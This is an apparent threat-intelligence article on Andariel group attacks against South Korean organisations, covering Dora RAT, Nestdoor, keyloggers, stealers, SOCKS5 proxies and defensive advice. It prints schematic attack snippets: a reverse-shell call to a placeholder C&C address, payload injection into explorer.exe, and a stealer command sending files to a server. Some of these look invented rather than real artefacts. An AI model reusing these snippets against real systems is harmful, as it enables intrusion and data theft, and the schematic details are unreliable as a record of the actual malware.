Andariel hackers target South Korean institutes with Dora RAT malware, exploiting vulnerabilities to steal data and control infected systems

Continue reading
The AhnLab Security Intelligence Center (ASEC) has identified a series of Advanced Persistent Threat (APT) attacks orchestrated by the Andariel group against South Korean corporations.
This Threatfeed delves into the technical nuances of the attacks, particularly focusing on the use of the new Dora RAT malware, keyloggers, infostealers, and proxy tools.
By examining the attack vectors, malware functionalities, and operational tactics, we aim to provide a comprehensive understanding of the threat landscape.
One confirmed attack vector involved exploiting a vulnerable Apache Tomcat server. The server, running a 2013 version of Apache Tomcat, was susceptible to multiple vulnerabilities. The attackers utilized this weakness to distribute backdoors and proxy tools.
Vulnerable System: Apache Tomcat 2013 Version
Exploitation Method: Remote code execution via known vulnerabilities
Malware Installed: Backdoors, Proxy ToolsNestdoor is a Remote Access Trojan (RAT) that has been used by the Andariel group since at least May 2022. It allows attackers to control infected systems, execute commands, upload/download files, and maintain persistence.
Command Execution Example:
reverse_shell("C&C_Server_IP", port)Dora RAT is a new malware strain developed in Go language, characterized by its simplicity and basic control features. It supports reverse shell operations and file transfer capabilities.
func main() {
// Decrypt and inject Dora RAT into explorer.exe
decryptedPayload := decryptResource("version.dll")
injectIntoProcess("explorer.exe", decryptedPayload)
}Some Dora RAT variants were signed with a valid certificate from a UK software developer, adding a layer of legitimacy and evading security software detection.
These tools, installed alongside Dora RAT, capture and log keystrokes and clipboard data, saving them to the `%TEMP%` directory.
Logged Data Storage Path: %TEMP%\logged_keystrokes.txt
Clipboard Data Storage Path: %TEMP%\clipboard_data.txtUsed for exfiltrating files from infected systems, particularly effective for large files.
Stealer Command Arguments:
--protocol tcp --server 192.168.1.1:443 --file /path/to/stealThe Andariel group utilized custom and open-source SOCKS5 proxy tools to maintain network connectivity and facilitate data exfiltration.
Proxy Tool Configuration:
Authentication String: "ProxyAuth2024"Andariel employs spear-phishing and watering hole attacks to gain initial access. They exploit known software vulnerabilities to distribute their malware.
Once inside the network, the attackers establish persistence through scheduled tasks and inject malware into legitimate processes. They move laterally using stolen credentials and existing network paths.
Organizations should regularly update software to patch known vulnerabilities. Applying the latest security patches for Apache Tomcat, VMware Horizon, and other critical software is crucial.
Implementing network segmentation can limit lateral movement. Critical systems should be isolated from less secure segments of the network.
Deploy comprehensive endpoint protection solutions to detect and block malicious activities. Regularly update antivirus and antimalware definitions.
Conduct regular training sessions to educate employees about phishing and social engineering attacks. Emphasize the importance of verifying email sources and avoiding suspicious attachments.
The Andariel group's recent attacks on South Korean organizations underscore the importance of robust cybersecurity measures. By leveraging advanced malware like Dora RAT and exploiting known vulnerabilities, they have demonstrated significant capabilities in both espionage and financial theft. Organizations must adopt a multi-layered security approach, combining technical defenses with user education to mitigate these sophisticated threats.

A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.